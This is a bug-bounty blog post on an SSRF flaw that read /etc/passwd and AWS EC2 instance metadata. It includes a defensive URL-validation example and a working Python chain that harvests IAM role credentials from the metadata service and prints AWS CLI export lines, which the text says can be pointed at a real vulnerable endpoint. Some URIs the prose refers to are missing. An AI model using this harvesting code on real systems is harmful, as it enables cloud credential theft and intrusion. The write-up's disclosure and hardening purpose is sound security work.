How attackers exploit an SSRF vulnerability to read local files and abuse AWS metadata

Posted by barello at 2020-04-17

Vulnerability introduction

This endpoint is used to load images that I had uploaded to the website earlier, and those images are stored in an AWS S3 bucket. Since the endpoint fetches content from a URL anyway, why not ask it to load content from other domains? How about trying RFI?

Here are my specific steps:

Try XSS (unfortunately, it failed)

Try to read a local file (successful)

The response comes back as a downloaded text file:

When I open the downloaded text file, its content surprises me: it is clearly the content of /etc/passwd.

Now that I know the website loads images from AWS, why not try to pull the internal AWS instance metadata as well?
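To make the issue concrete, here is an added example (mine, not the affected site's code) of an image-loading endpoint of the kind described above: a vulnerable fetcher that hands the client-supplied URL straight to the HTTP library, and beside it the check that stops file:// reads and link-local metadata requests. The function names, the allowlist and the bucket hostname are assumptions made for this example.

```python
"""Added example: vulnerable image fetcher next to a hardened URL check.
ALLOWED_HOSTS, the bucket hostname and all function names are assumptions
for this example; none of this is the site's real code."""
import ipaddress
import urllib.request
from urllib.parse import urlparse

# Assumed: the site only ever needs to load images from its own bucket.
ALLOWED_HOSTS = {"images-example-bucket.s3.amazonaws.com"}


def load_image_vulnerable(url: str) -> bytes:
    """Vulnerable: whatever the client supplies is fetched by the server.

    urllib happily follows file:///etc/passwd (local file read) and
    http://169.254.169.254/... (instance metadata), which is exactly the
    behaviour the write-up exploits.
    """
    with urllib.request.urlopen(url) as resp:  # nosec: intentionally unsafe
        return resp.read()


def is_internal_ip(host: str) -> bool:
    """True if `host` is an IP literal for a non-public address.

    Also handles the all-digits form (2852039166 == 169.254.169.254) that
    urlparse returns as a plain string and naive filters overlook.
    """
    try:
        ip = ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return False  # not an IP literal at all (a hostname)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_allowed_image_url(url: str) -> bool:
    """Hardened check: https only, no credentials in the URL, no internal IP
    literals, and the host must be on the allowlist."""
    parsed = urlparse(url)
    if parsed.scheme != "https":          # rejects file://, gopher://, http://
        return False
    host = parsed.hostname                # lower-cased, brackets stripped
    if not host:
        return False
    if parsed.username or parsed.password:  # https://bucket@169.254.169.254/
        return False
    if is_internal_ip(host):
        return False
    return host in ALLOWED_HOSTS


def load_image_hardened(url: str) -> bytes:
    """Same fetch, but only after the URL passes the check above."""
    if not is_allowed_image_url(url):
        raise ValueError("refusing to fetch %r" % url)
    return load_image_vulnerable(url)


if __name__ == "__main__":
    for candidate in ("https://images-example-bucket.s3.amazonaws.com/cat.png",
                      "file:///etc/passwd",
                      "http://169.254.169.254/latest/meta-data/",
                      "https://2852039166/"):
        print(candidate, "->", "allowed" if is_allowed_image_url(candidate) else "blocked")
```

The allowlist is what actually closes the hole; the IP checks are for endpoints that must accept arbitrary hosts, and they only cover literal addresses. A hostname that resolves to 169.254.169.254 or 127.0.0.1 (including DNS rebinding between check and fetch) has to be caught by resolving it first and connecting to the address you checked, which this example does not do.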

Read AWS EC2 metadata

By changing the URL parameter you can list all categories of instance metadata for the currently running instance. To do this, use the following URI:

In this way we can read the secret access key, session token and other confidential information. Once these are exported, they can be used through the AWS CLI. You know what that means.
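The chain from the metadata listing to usable AWS CLI credentials, as an added example that is not part of the original post. The IMDS address and the security-credentials path are documented AWS facts; the role name, every credential value and the `fake_fetch` callable that stands in for "the vulnerable endpoint fetches this URL for us" are constructed here. A caveat the 2020 write-up does not mention: IMDSv2 requires a session token obtained with an HTTP PUT carrying the X-aws-ec2-metadata-token-ttl-seconds header, which a GET-only SSRF cannot send, so this chain only works against IMDSv1.

```python
"""Added example (not the write-up's code): walk EC2 IMDSv1 through an SSRF
primitive and turn the result into AWS CLI environment variables.
IMDS_BASE and CREDS_PATH are documented AWS values; the role name, the
credential values and fake_fetch are constructed for this example."""
import json
import shlex
from typing import Callable, Dict, List

IMDS_BASE = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"

# Constructed IMDSv1 responses; every value is deliberately fake.
FAKE_IMDS: Dict[str, str] = {
    "/latest/meta-data/": "ami-id\nhostname\niam/\ninstance-id\nlocal-ipv4\n",
    CREDS_PATH: "example-app-role\n",
    CREDS_PATH + "example-app-role": json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLEFAKEKEY01",
        "SecretAccessKey": "fakeSecretAccessKeyForThisExampleOnly0000",
        "Token": "FakeSessionTokenForThisExampleOnly==",
        "Expiration": "2020-04-17T12:00:00Z",
    }),
}

Fetch = Callable[[str], str]


def fake_fetch(url: str) -> str:
    """Stand-in for the SSRF: the server fetches `url` and returns the body."""
    if not url.startswith(IMDS_BASE):
        raise ValueError("fake IMDS only answers for " + IMDS_BASE)
    return FAKE_IMDS[url[len(IMDS_BASE):]]  # KeyError plays the part of a 404


def list_metadata_categories(fetch: Fetch) -> List[str]:
    """Top-level listing: one category per line, directories end in '/'."""
    return fetch(IMDS_BASE + "/latest/meta-data/").split()


def list_roles(fetch: Fetch) -> List[str]:
    """Instance-profile role names; empty if no IAM role is attached."""
    try:
        return fetch(IMDS_BASE + CREDS_PATH).split()
    except KeyError:
        return []


def get_role_credentials(fetch: Fetch, role: str) -> Dict[str, str]:
    """The temporary (STS) credentials IMDS returns for `role` as JSON."""
    creds = json.loads(fetch(IMDS_BASE + CREDS_PATH + role))
    if creds.get("Code") != "Success":
        raise RuntimeError("IMDS reported %s" % creds.get("Code"))
    return creds


def credentials_to_env(creds: Dict[str, str]) -> Dict[str, str]:
    """Map IMDS field names onto the variables the AWS CLI reads."""
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],  # mandatory: these are STS creds
    }


def harvest(fetch: Fetch) -> Dict[str, str]:
    """Full chain: categories -> roles -> credentials -> CLI environment."""
    if "iam/" not in list_metadata_categories(fetch):
        return {}  # no instance profile, nothing to steal here
    roles = list_roles(fetch)
    if not roles:
        return {}
    return credentials_to_env(get_role_credentials(fetch, roles[0]))


def export_lines(env: Dict[str, str]) -> str:
    """Shell lines to paste before e.g. `aws sts get-caller-identity`."""
    return "\n".join("export %s=%s" % (k, shlex.quote(v)) for k, v in env.items())


if __name__ == "__main__":
    print(export_lines(harvest(fake_fetch)))
```

Against a real target, `fetch` would wrap the vulnerable image endpoint with the metadata URL in its URL parameter; the rest of the chain is unchanged. The Expiration field matters in practice: the credentials are short-lived, so whatever you do with the AWS CLI has to happen before they rotate.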

In short, given the permissions obtained here, the SSRF vulnerability can be escalated to RCE.

I have reported the vulnerability to the relevant team, and it has now been fixed. I also received a four-figure bounty. I hope this article is helpful to you!